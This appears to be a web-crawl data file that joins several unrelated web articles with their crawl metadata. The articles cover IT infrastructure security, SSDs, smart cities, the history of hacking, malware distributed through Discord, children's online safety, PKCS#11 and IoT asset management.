You can read the whole report compiled by Amanda McPherson, brian Proffitt and Ron Hale-Evans here (opens in new tab). | <urn:uuid:4dc84d52-f0fa-486f-8e04-f344277f3330> | CC-MAIN-2022-40 | https://www.itproportal.com/2008/10/23/linux-costs-usd-108-billion-build-says-linux-foundation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00566.warc.gz | en | 0.918115 | 368 | 2.640625 | 3 |
Network Infrastructure Security, typically applied to enterprise IT environments, is a process of protecting the underlying networking infrastructure by installing preventative measures to deny unauthorized access, modification, deletion, and theft of resources and data.
How can an information system infrastructure be made secure?
Access to all equipment, wireless networks and sensitive data should be guarded with unique user names and passwords keyed to specific individuals. … If you create a master document containing all user passcodes, be sure to encrypt it with its own passcode and store it in a secure place. 2. Design safe systems.
What do u mean by infrastructure security?
Infrastructure security is the security provided to protect infrastructure, especially critical infrastructure, such as airports, highways rail transport, hospitals, bridges, transport hubs, network communications, media, the electricity grid, dams, power plants, seaports, oil refineries, and water systems.
WHY IT infrastructure security is important?
IT infrastructure security is essential in protecting companies against online threats. … Infrastructure security tools and methods can help businesses mitigate the risk of falling victim to data theft and sabotage of the IT infrastructure.
What is the infrastructure for an IT security policy?
The infrastructure will be designed to ensure the confidentiality, integrity, and availability (CIA) of information. In particular, the protection of systems and information against unauthorized access, against unauthorized modification or disclosure, and protection of systems against denial of service.
What is the relationship between infrastructure and security?
Consolidated visibility across multiple networks and even entire facilities can help security teams quickly identify and contain any threat that might move laterally across the infrastructure. This can also help security and IT teams develop a more proactive approach to security.
What makes a system secure?
A system is said to be secure if its resources are used and accessed as intended under all the circumstances, but no system can guarantee absolute security from several of the various malicious threats and unauthorized access.
What are the 3 types of infrastructure security?
Access Control: The prevention of unauthorized users and devices from accessing the network. Application Security: Security measures placed on hardware and software to lock down potential vulnerabilities. Firewalls: Gatekeeping devices that can allow or prevent specific traffic from entering or leaving the network.
Which is an example of infrastructure?
The term infrastructure refers to the basic physical systems of a business, region, or nation. … Examples of infrastructure include transportation systems, communication networks, sewage, water, and electric systems.
Does infrastructure include security?
A physical security systems infrastructure is a network of electronic security systems and devices that is configured, operated, maintained and enhanced to provide security functions and services (such as operational and emergency communications and notification, intrusion detection, physical access control, video …
What are the 5 areas of infrastructure security?
- Chemical Sector.
- Commercial Facilities Sector.
- Communications Sector.
- Critical Manufacturing Sector.
- Dams Sector.
- Defense Industrial Base Sector.
- Emergency Services Sector.
- Energy Sector.
What are the 7 domains of IT infrastructure?
Seven Domains of IT Infrastructure Seven domains can be found in a typical IT infrastructure. They are as follows: User Domain, Workstation Domain, LAN Domain, LAN-to-WAN Domain, Remote Access Domain, WAN Domain, and System/Application Domain.
Why is infrastructure security important to organizations and governments?
Together, public-private efforts to strengthen critical infrastructure help the public sector to enhance security and rapidly respond to, and recover from, all-hazards events and help the private sector restore business operations and minimize losses in the face of such an event.
What are the three types of security policies?
Security policy types can be divided into three types based on the scope and purpose of the policy:
- Organizational. These policies are a master blueprint of the entire organization’s security program.
- System-specific. …
What is ICT security policy?
Policy Statement. This policy seeks to protect the confidently, integrity, and availability of information and ICT Facilities through the use of established IT security processes and practices. It should be read in conjunction with the ICT Acceptable Use Policy. Scope.
What should be included in IT security policy?
Information security objectives
Confidentiality—only individuals with authorization canshould access data and information assets. Integrity—data should be intact, accurate and complete, and IT systems must be kept operational. Availability—users should be able to access information or systems when needed. | <urn:uuid:1a1a9ea7-262f-4620-bb34-0ae4856bff01> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/your-question-what-does-it-mean-for-your-it-infrastructure-to-be-secure.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00566.warc.gz | en | 0.896726 | 930 | 3.15625 | 3 |
A solid-state drive (SSD) is one of the most popular, fastest, and energy-efficient solutions for…
Solid state hard drives are the hottest thing in data storage today.
A smaller footprint plus faster response time and lower power consumption are hallmarks of solid state storage that employs cutting-edge Nand flash technology.
With an SSD, an array of memory chips work together as a disk drive volume. Instead of using traditional magnetic media like conventional hard drives, SSDs use integrated circuits (ICs) as the storage media.
Over the past few years, there’s been an explosion of new products using this silicon-based storage technology. Smartphones, digital camera media and tablet computers, all utilize some type of flash memory system.
Click here for an explanation on the development of the technology.
The best thing about this new technology is that it uses no moving parts, making mechanical failure a thing of the past. The only negatives of SSDs are high prices and low storage capacities, both of which will change for the better over time.
Although SSDs have no moving parts they are still susceptible to failure. Regular backups are always advisable whether your data lives on a conventional hard drive or a solid state storage device. If you suffer an SSD failure, and don’t have an adequate backup, DriveSavers can help get your data back. We have the most advanced techniques and capabilities plus the highest level of success in the industry. | <urn:uuid:b33d0d23-208e-4556-a3eb-b8706bb71ae8> | CC-MAIN-2022-40 | https://drivesaversdatarecovery.com/ssds-come-of-age/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00566.warc.gz | en | 0.894283 | 299 | 2.796875 | 3 |
June 24, 2020
Dr. Jonathan Reichental, former CIO of the City of Palo Alto and the Founder and CEO of Human Future, explores what is at the heart of the future of all cities.
To succeed at elevating the human condition for billions of people, cities need to adopt new ideas, new approaches, and new technologies for how they’re operated and delivered. That’s the definition of a smart city.
The smart city is about people; it’s about improving the quality of life for urban communities all over the world.
When developing a smart city, the focus isn’t just on exploring technology, although technology does play a large role. Neither do cities need to create a surveillance society or erode privacy in order to succeed. At their core, smart cities aren’t about sensors or algorithms or virtual town halls — they’re about a better future for humanity. After all, to quote Shakespeare, “What is the city but the people?”
“What is the city but the people?”
Earth is already a majority urban planet and it’s estimated that, by midcentury, 70 percent of all humans will live in an urban area. Put another way, our human future belongs to cities. Most people will spend their days living, working, and playing in a metropolis. If we want to enjoy career opportunities, clean air and water, efficient transportation, low-cost energy, safety, convenient city services, and inclusion while all the time saving the planet from a climate crisis, we have a lot of city work ahead of us.
The city is already the center of the human experience. It is the most complicated and successful of all inventions. Urban areas have lifted billions of people out of extreme poverty, and they continue to shape and define our future. The challenges ahead for cities aren’t trivial. Cities have come a long way, but they have a long way to go. Building better and smarter cities may be the biggest challenge that humanity now faces.
“If we want to enjoy career opportunities, clean air and water, efficient transportation, low-cost energy, safety, convenient city services, and inclusion while all the time saving the planet from a climate crisis, we have a lot of city work ahead of us.”
I wrote Smart Cities For Dummies as the definitive reference guide for anyone who has an interest in creating safer and more prosperous communities. It’s also for anyone who wants to understand the opportunities and challenges in the world’s cities. When I discovered that cities would be central to our human future, I was compelled to become a part of positive change. I’ve spent several years helping to build smarter communities and educate city leaders on almost every continent. The realization that done right, cities were capable of offering the best solutions for a better tomorrow was the moment my passion for cities emerged. This book is my attempt to share the city planning-and-development lessons and ideas I’ve discovered and executed along the way.
Smart Cities For Dummies is the first comprehensive reference and how-to book that gives you the knowledge and tools to build smarter cities and improve the quality of life for the greatest number of people. The book is available for preorder around the world at your favorite bookstore or online bookseller. It is also available in many territories on Amazon: http://www.smartcitybook.com | <urn:uuid:885359db-477d-4f3c-8fec-2c704f33fbbd> | CC-MAIN-2022-40 | https://internetofbusiness.com/what-defines-smart-city/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00566.warc.gz | en | 0.941894 | 708 | 2.875 | 3 |
While our team is now extremely well-versed and full of experts in the field of cybersecurity, there once was a time where hacking was a new concept to, well…everyone! Before the knowledge that allows us to deliver a superior threat defense using industry-leading security partners and technologies was available, we too were learning all about the ins and outs of hacking.
When did it begin? Who was the first to try it? Join us for a brief journey through the history of hacking that, by default, helped Kobargo become who we are!
How Hacking Started
We’ve all come to know the most commonly known use for the word “hacker” as a descriptor for someone who (ordinarily) maliciously engages in cybercriminal activity. Typically, they gain access to platforms, servers, information, and more through means of digital breaking and entering, essentially. However, the modern use of the word in relation to computers and technology is a fairly new introduction.
According to The New Yorker, a meeting at M.I.T. in 1955 is to be thanked for it.
In minutes detailing a meeting of The Tech Model Railroad Club, one line reads: “Mr. Eccles requests that anyone working or hacking on the electrical system turn the power off to avoid fuse blowing.” In an article by Tripwire, this was in reference to members in the club “hacking” high-tech train sets to improve their functions and make customizations. Eventually, those individuals moved from trains to computers and joined an early group of tech-users that played with hacking abilities and created some of the programs we all use today.
By the 1960s, the term “hack” was widely being used by the budding computer industry and in 1975 a glossary for computer programmers, called The Jargon File, was launched that gave us a more well-known definition. It defined hacker in multiple ways, one being: “[deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence password hacker, network hacker. The correct term for this sense is cracker.”
In the 1970s, we saw hacker John Draper become an infamous household name due to “phreaking”, or phone hacking. In fact, according to Esquire, Steve Wozniak and Steve Jobs were phone phreakers before creating Apple, further proving that hacking during the time period was booming. As the 1980s arrived, the general population was beginning to fill their homes with personal computers and hacking was now possible for anyone who owned one, not just businesses or wealthy enough entities.
M.I.T. can also be credited for hacking the annual Harvard-Yale balloon incident on November 30, 1982. According to CyberSecurityMastersDegree.org, a black balloon inflated along the sideline stopped the game, and on it was a set of letters that read “MIT”. The balloon popped, and the football game was officially “hacked”. With a new influx of even more advanced tactics, 1986 brought about the first legislation that had to do with hacking, the Federal Computer Fraud, and Abuse Act.
While the goal of hacking hasn’t changed much in 40 years, the approach and severity of attacks undeniably have. Not to mention, cybercriminals are far more bold, brazen, and unbothered. Unlike the early years in hacking, the 2000s and beyond have shown us that even the biggest, most secure companies are at risk. Take famous 21st-century breaches such as those at Yahoo, Equifax, Target, Uber, and Sony PlayStation for example, just to name a few.
In 2020 we’re seeing hackers evolve beyond our wildest, earliest imaginations in terms of hacking abilities. We’ve even witnessed hacking become popular in its own right with small events like local hackathon seminars and entire careers based on ethical hacking. Plus, movies such as Snowden, Eagle Eye, and Die Hard have helped the topic become slightly mainstream. Basically, hacking can absolutely be detrimental, but it can also be an extremely useful tool. We’re far from the beginning and nowhere near the end with hacking, but we certainly are ready to take it on.
How We Can Help
We have nearly 50 years of experience working in technology at Kobargo, and a drive to deliver the promised service you expect. We understand that the one size fits all model doesn’t apply to each business and each company has unique needs, challenges, and budgets. We can help you gain a clear understanding of your environment and ultimate goals and can create a plan that meets your needs. Contact us today to see if we can you and your organization. | <urn:uuid:4a76e5e9-d135-4aa9-bf54-26728740cff6> | CC-MAIN-2022-40 | https://www.kobargo.com/2020/01/21/a-history-of-hacking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00566.warc.gz | en | 0.964012 | 975 | 2.765625 | 3 |
Discord, a free VoIP service designed for gaming communities, has had its chat servers abused to host malware. Most of the malicious samples found distributed on the app were remote access Trojans (RATs), such as NanoCore (Trojan.Nancrat), njRAT (Backdoor.Ratenjay), and SpyRat (W32.Spyrat), among others.
How is Discord used?
Since it was released in March 2015, Discord's popularity has increased especially among gamers, given that it is free, simple, multiplatform, and innovative. As of July 2016, more than 11 million people have used it.
Any Discord user can create a server, or group, in less than 10 seconds. Most of the groups on Discord are gamer gatherings (teams, guilds, clans) that use the VoIP service to communicate (via chat or voice) whether gaming or not.
Other groups focusing on a broader audience have also surfaced on Discord. For example, IT security researchers have created servers on Discord. In some cases, users have set a never expire invite link to their groups and advertised it on third-parties websites. These are usually marketed as places where knowledge is being shared and exchanged on particular topics. Some of these groups have thousands of members—most are gaming-related, while others are tech- and anime-related.
However, hacking groups have also set up Discord servers and are actively inviting people to join. Even shadier groups have created Discord servers that serve as a black market for the sale of malware or stolen data.
How do attackers distribute malware on Discord?
Using its chat feature, Discord’s users can post messages and links, embed pictures and videos, and upload attachments. Most gamers’ teams and guilds also use some chat channels as documentation boards.
Since the chat app allows members to upload most types of files, attackers can create a server and post or upload malicious attachments to the chat, then use it in a second-stage attack as a download site. Other attackers don’t have to create a server of their own—they could simply manually post malware to a server they had been invited to, so they could bait other unwitting users into opening the threat.
Besides the infamous and accessible RATs, such as NanoCore, njRAT, and SpyRAT, we also found various infostealers, Trojan Horse malware samples, and downloaders among the files we’ve seen hosted on Discord. These may have been part of a drive-by download strategy or social-engineering campaign.
Figure. A NanoCore sample observed on a Discord chat channel server.
In our observation, NanoCore was the most prevalent among the malware hosted on Discord's chat servers. This RAT has been around since at least 2013, with a few versions leaked early last year, and NanoCore RAT activity has not ceased since then. The RAT mainly affects computers in the US, followed by Japan and Germany.
Who are the targets?
Since the service was designed specifically for gamers, the majority of targets are from the gaming community. The app does attract a large number of video-streamers as its technology allows for synergy, a mode that lets users hide sensitive information while streaming content such as gaming sessions.
The attackers behind the RATs and other malware may have distributed their threats on the service to steal sensitive information related to online gaming (credentials, items, in-game currency, and contacts) directly from the victim’s computer. This data can be valuable to attackers just as much as other personally identifiable information (PII), such as users' bank account details, web service credentials, contact numbers, IP addresses, and biometric information. These could all be harvested by data thieves in the process.
Symantec Security Response has contacted Discord’s security team, who swiftly removed the malicious files from the servers’ chat channels. Discord also added a new virus scan feature, which runs on its backend servers whenever a user uploads an executable or archive file. Discord does not support or endorse third-party websites that host a list of open invite Discord servers.
Symantec recommends users adhere to the following best practices when using Discord:
- Do not download or run programs from people you do not know
- Use the service’s permission control features which allow users to regulate the server’s users.
- Restrict users’ permissions to curb abuse on the service, or grant individual permissions for better control.
- When joining a Discord server, be careful of the content being posted on the chat channels.
- Do not give out personal information to strangers when using the voice channel.
To stay protected against malware, Symantec advises users to keep their computers, security software, and other programs up-to-date by applying the latest patches and updates. We also advise users to be careful of links being shared on social applications.
Symantec and Norton products detect the malware discussed in this blog as the following: | <urn:uuid:2603e249-1122-427a-abf8-78d10f60fc4c> | CC-MAIN-2022-40 | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=bd74c5bf-bcb3-48b3-af00-e88d9e8f7f31&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00766.warc.gz | en | 0.945711 | 1,055 | 2.578125 | 3 |
Starting a new school year is both exciting and stressful for families today. Technology has magnified learning and connection opportunities for our kids but not without physical and emotional costs that we can’t overlook this time of year.
But the transition from summer to a new school year offers families a fresh slate and the chance to evaluate what digital ground rules need to change when it comes to screen time. So as you consider new goals, here are just a few of the top digital risks you may want to keep on your radar.
- Cyberbullying. The online space for a middle or high school student can get ugly this time of year. In two years, cyberbullying has increased significantly from 11.5% to 15.3%. Also, three times as many girls reported being harassed online or by text than boys, according to the U.S. Department of Education.
Back-to-School Tip: Keep the cyberbullying discussion honest and frequent in your home. Monitor your child’s social media apps if you have concerns that cyberbullying may be happening. To do this, click the social icons periodically to explore behind the scenes (direct messages, conversations, shared photos). Review and edit friend lists, maximize location and privacy settings, and create family ground rules that establish expectations about appropriate digital behavior, content, and safe apps.Make an effort to stay current on the latest social media apps, trends, and texting slang so you can spot red flags. Lastly, be sure kids understand the importance of tolerance, empathy, and kindness among diverse peer groups.
- Oversharing. Did you know that 30% of parents report posting a photo of their child(ren) to social media at least once per day, and 58% don’t ask permission? By the age of 13, studies estimate that parents have posted about 1,300 photos and videos of their children online. A family’s collective oversharing can put your child’s privacy, reputation, and physical safety at risk. Besides, with access to a child’s personal information, a cybercriminal can open fraudulent accounts just about anywhere.
Back-to-School Tip: Think before you post and ask yourself, “Would I be okay with a stranger seeing this photo?” Make sure there is nothing in the photo that could be an identifier such as a birthdate, a home address, school uniforms, financial details, or password hints. Also, maximize privacy settings on social networks and turn off photo geo-tagging that embeds photos with a person’s exact coordinates. Lastly, be sure your child understands the lifelong consequences that sharing explicit photos can have on their lives.
- Mental health + smartphone use. There’s no more disputing it (or indulging tantrums that deny it) smartphone use and depression are connected. Several studies of teens from the U.S. and U.K. reveal similar findings: That happiness and mental health are highest at 30 minutes to two hours of extracurricular digital media use a day. Well-being then steadily decreases, according to the studies, revealing that heavy users of electronic devices are twice as unhappy, depressed, or distressed as light users.
Back-to-School Tip: Listen more and talk less. Kids tend to share more about their lives, friends, hopes, and struggles if they believe you are truly listening and not lecturing. Nurturing a healthy, respectful, mutual dialogue with your kids is the best way to minimize a lot of the digital risks your kids face every day. Get practical: Don’t let your kids have unlimited phone use. Set and follow media ground rules and enforce the consequences of abusing them.
- Sleep deprivation. Sleep deprivation connected to smartphone use can dramatically increase once the hustle of school begins and Fear of Missing Out (FOMO) accelerates. According to a 2019 Common Sense Media survey, a third of teens take their phones to bed when they go to sleep; 33% girls versus 26% of boys. Too, 1 in 3 teens reports waking up at least once per night and checking their phones.
Back-to-School Tip: Kids often text, playing games, watch movies, or YouTube videos randomly scroll social feeds or read the news on their phones in bed. For this reason, establish a phone curfew that prohibits this. Sleep is food for the body, and tweens and teens need about 8 to 10 hours to keep them healthy. Discuss the physical and emotional consequences of losing sleep, such as sleep deprivation, increased illness, poor grades, moodiness, anxiety, and depression.
- School-related cyber breaches. A majority of schools do an excellent job of reinforcing the importance of online safety these days. However, that doesn’t mean it’s own cybersecurity isn’t vulnerable to cyber threats, which can put your child’s privacy at risk. Breaches happen in the form of phishing emails, ransomware, and any loopholes connected to weak security protocols.
Back-to-School Tip: Demand that schools be transparent about the data they are collecting from students and families. Opt-out of the school’s technology policy if you believe it doesn’t protect your child or if you sense an indifferent attitude about privacy. Ask the staff about its cybersecurity policy to ensure it has a secure password, software, and network standards that could affect your family’s data is compromised.
Stay the course, parent, you’ve got this. Armed with a strong relationship and media ground rules relevant to your family, together, you can tackle any digital challenge the new school year may bring.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:deb92e70-b1f9-4caf-a1e5-8810c6f69ed4> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/consumer/family-safety/5-digital-risks-that-could-affect-your-kids-this-new-school-year/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00766.warc.gz | en | 0.928272 | 1,182 | 2.671875 | 3 |
Everything you ever wanted to know about the popular standard for HSMs
PKCS#11 is the most widely-used interface standard for general-purpose cryptographic hardware such as Hardware Security Modules (HSMs). Originally proposed by RSA in 1994 as part of their Public Key Cryptography Standards series, it was transferred to OASIS in 2013, and is now in version 3.0.
The standard has great benefits for interoperability, but contains a number of traps for the unwary. Here you can find all our resources for understanding the risks and making sure you use PKCS#11 securely.
What's the difference between being compliant with the PKCS#11 standard, and being vulnerable?
In this video Graham explains why you need to know about PKCS11 compliance and how it can make a difference to the security of smartcards, HSMs and other secure hardware.
See our whole Youtube playlist on PKCS#11.
Modern applications that use cryptography usually access that functionality via an application program interface (API) to a software or hardware cryptographic provider. Security-critical applications often make use of Hardware Security Modules (HSMs): special purpose computers that provide high-speed cryptographic services whilst keeping key material inside a tamper-sensitive enclosure. Together with smart cards or similar chip-based tokens, they form the backbone of many modern cryptographic applications in diverse sectors from banking to automotive.
In this white paper, we discuss attacks on systems using the PKCS#11 API. We consider what it means for an interface to be secure, and we discuss how to audit applications’ use of the API. There will be plenty of concrete examples of attacks on real devices, and we will explain how to detect these issues using Cryptosense Analyzer Platform. | <urn:uuid:8bd67c09-f65d-419f-a85f-591acf87772b> | CC-MAIN-2022-40 | https://cryptosense.com/knowledge-base/pkcs11-cryptography | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00766.warc.gz | en | 0.914236 | 357 | 2.828125 | 3 |
Iot or Internet of Things technology has meant a real revolution in the integration of the physical world with the digital one. What’s more, IoT is present in many moments of your day-to-day life.
“The Internet of Things has the potential to change the world, just like the Internet did. Maybe even more so”
Over the last decade, the technology industry has been characterised by constant innovation. When just 5 years ago 4G was a breakthrough that revolutionised the telecommunications sector, today we are already “used to it” and now it is the benefits of 5G which is the talk of the town.
In this dynamic environment in which technology companies operate, in which every year there are more things happening than in a season of Game of Thrones, there are certain advances that mark a breakthrough in the discoveries to come.
Within this group of what have been called “emerging telecom technologies”, Iot or Internet of Things technology has meant a real revolution in the integration of the physical world with the digital one. What’s more, IoT is present in many moments of your day-to-day life.
If you are one of those people who have heard about it and want to know the significance of this technological phenomenon, we believe that this article can serve as a useful guide to catch up.
What is IoT and why is it so important?
The IoT consists of a large set of devices or objects that are interconnected, allowing them to share data with each other. This is possible because, as the Internet of Things Agenda explains, these devices have unique identifiers (UIDs) and the ability to transfer data over the network without the need for human-computer interaction.
In essence, Internet of Things involves establishing a global Internet network to take control of electronic devices or associated systems that are connected to each other. This improved integration between the physical and virtual worlds pays off in the long term and usually results in improved efficiency, accuracy, and economic benefit.
This new technology, as its developer Kevin Ashton predicted, has the potential to change the world in the same way that the Internet once did. IoT is going to bring about a real revolution for both individuals and companies, as the automation of tasks will exponentially increase the productivity of companies.
If one thing is clear from what we have seen so far, it is that IoT is here to stay. Statista forecasts that by 2021 there will be 358.82 billion IoT devices installed worldwide and 754.44 billion by 2025.
1. Scope of application.
The emergence of this technology has allowed devices that had previously been considered as “ordinary” to be connected to Internet by simply adding special sensors to everyday objects such as a refrigerator, a washing machine or even a shaver.
As we can see, Iot is a very valuable resource on a personal scale. For example, humans could benefit from this new technology when friends invite themselves to your home out of the blue. In that scenario, they can send a message (even from their office) to the cleaning robot to clean their home before the visit. Considered in this light, the significance of this discovery is self-explanatory, isn’t it?
However, the importance of this technology goes far beyond domestic use. Other sectors, such as agriculture and livestock farming, have also benefited from this discovery. Thanks to IoT technology, the agricultural sub-sector will be able to efficiently control water consumption by using humidity sensors and equipment. The livestock sub-sector, for its part, has been able, thanks to measuring devices, to improve animal welfare without negatively impacting productivity.
As expected, the telecom sector was not going to be left behind in the implementation of new technologies. Ericsson sees IoT as an industry tipping point and a game changer. The inclusion of IoT in the sector is expected to result in a considerable improvement in machine-to-machine and machine-to-human communication.
2. Future plans.
Perhaps, in the face of this flood of information, you are asking yourself, “What’s next?
The future of this technology is bright and encompasses every sector we can imagine. At the domestic level, virtual devices such as Alexa or Google Home will find more and more Iot-enabled devices to connect to and facilitate the automation of tasks in our day-to-day lives.
On many occasions, people have tried to explain this technology by comparing it to a spider, in which the body is the global network that controls the devices, and the different legs represent each device that is connected to it through sensors. Well, it seems that as years go by, this spider is transforming into a centipede, as more and more technology companies are betting on the creation of electronic devices that are interconnected.
3. Discover TREE.
Atrebo has developed TREE, an asset management digital transformation platform specialised in process automation and infrastructure management. At Atrebo, we are aware of the benefits of IoT technology in process automation, which is why this technology plays a fundamental role in the provision of our services. In particular, it is a fundamental tool when providing our preventive maintenance service. We invite you to take a look at our case study on the subject.
At Atrebo, we help our clients improve the management of their critical infrastructures by transferring our know-how to them. With the help of our solution, your company will be able to increase productivity, digitise processes, reduce operating costs or identify new sources of revenue by adopting a digital strategy, thanks to the knowledge acquired in our 10 years of experience in the sector. | <urn:uuid:270854a9-9d4b-460c-a14c-354198356671> | CC-MAIN-2022-40 | https://www.atrebo.com/en/iot-present-and-future-in-corporate-asset-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00766.warc.gz | en | 0.954438 | 1,162 | 2.90625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.